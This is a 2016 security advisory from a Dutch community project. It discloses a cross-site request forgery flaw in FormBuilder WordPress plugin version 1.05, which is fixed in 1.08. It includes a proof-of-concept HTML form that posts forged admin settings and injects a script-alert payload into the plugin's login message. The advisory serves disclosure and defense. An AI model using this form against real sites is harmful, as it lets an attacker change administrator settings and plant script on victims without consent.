------------------------------------------------------------------------ Cross-Site Request Forgery vulnerability in FormBuilder WordPress Plugin allows plugin permissions modification ------------------------------------------------------------------------ Burak Kelebek, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Request Forgery vulnerability has been encountered in the FormBuilder WordPress Plugin. This issue allows an attacker to change permission settings for the plugin by luring a logged on WordPress Administrator into following a malicious link. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0005 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on FormBuilder version 1.05. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in FormBuilder version 1.08. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_formbuilder_wordpress_plugin_allows_plugin_permissions_modification.html The FormBuilder plugin lacks a CSRF (nonce) token on the request of saving permissions. Because of this an attacker is able to change permission settings for the plugin. To achieve this a logged on WordPress Administrator must be lured into following a malicious link. Proof of Concept code that demonstrates this issue can be found below. Proof of concept The Proof of Concept code below injects script code in the "Login Required Message" in the settings page of the FormBuilder plugin. <html> <body> <form action="http://build.wordpress-develop.dev/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="task" value="wdm&#95;save&#95;settings" /> <input type="hidden" name="action" value="wdm&#95;settings" /> <input type="hidden" name="section" value="basic" /> <input type="hidden" name="wpdm&#95;permission&#95;msg" value="Access&#32;Denied" /> <input type="hidden" name="wpdm&#95;login&#95;msg" value="&lt;script&gt;alert&#40;&apos;csrf&#32;xss&apos;&#41;&lt;&#47;script&gt;&apos;" /> <input type="hidden" name="&#95;wpdm&#95;file&#95;browser&#95;root" value="&#47;srv&#47;www&#47;wordpress&#45;develop&#47;build&#47;" /> <input type="hidden" name="&#95;wpdm&#95;file&#95;browser&#95;access&#91;&#93;" value="administrator" /> <input type="hidden" name="&#95;&#95;wpdm&#95;sanitize&#95;filename" value="0" /> <input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;speed" value="4096" /> <input type="hidden" name="&#95;&#95;wpdm&#95;download&#95;resume" value="1" /> <input type="hidden" name="&#95;&#95;wpdm&#95;support&#95;output&#95;buffer" value="1" /> <input type="hidden" name="&#95;&#95;wpdm&#95;open&#95;in&#95;browser" value="0" /> <input type="hidden" name="&#95;wpdm&#95;recaptcha&#95;site&#95;key" value="" /> <input type="hidden" name="&#95;wpdm&#95;recaptcha&#95;secret&#95;key" value="" /> <input type="hidden" name="&#95;&#95;wpdm&#95;disable&#95;scripts&#91;&#93;" value="" /> <input type="hidden" name="&#95;&#95;wpdm&#95;login&#95;url" value="" /> <input type="hidden" name="&#95;&#95;wpdm&#95;register&#95;url" value="" /> <input type="hidden" name="&#95;&#95;wpdm&#95;user&#95;dashboard" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way.